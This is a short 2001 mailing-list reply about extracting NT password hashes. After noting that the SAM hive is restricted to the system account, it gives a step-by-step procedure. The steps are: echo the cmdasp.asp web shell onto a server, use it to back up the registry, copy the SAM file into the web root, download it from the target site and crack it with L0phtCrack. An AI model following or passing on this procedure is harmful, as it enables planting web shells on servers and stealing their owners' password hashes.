RE: Extracting NT password hashes from registry export file

From: pmawsonat_private
Date: Wed Oct 31 2001 - 14:00:18 PST

    David

    One problem you have is even administrator doesn't have access to the sam
    and security hives in the registry.
    Only the system account has access to these.
    As a result it is unlikely that the registry export contains these hives.
    There may be passwords cached in other areas, I don't know, someone else may
    be able to answer that one.

    If you can run regedit /e then you should be able to run
    echo "I am the first line of cmdasp.asp" >cmdasp.asp
    echo "I am the second line of cmdasp.asp" >>cmdasp.asp
    and so on.

    Use this technique to get cmdasp.asp up to the server.

    You can then use cmdasp.asp to run rdisk /s- (back up the registry to the
    repair directory)
    Run copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam._
    Use your browser to download the file  http://www.taget.com/sam._
    Run it through lophtcrack and you're done.

    Phill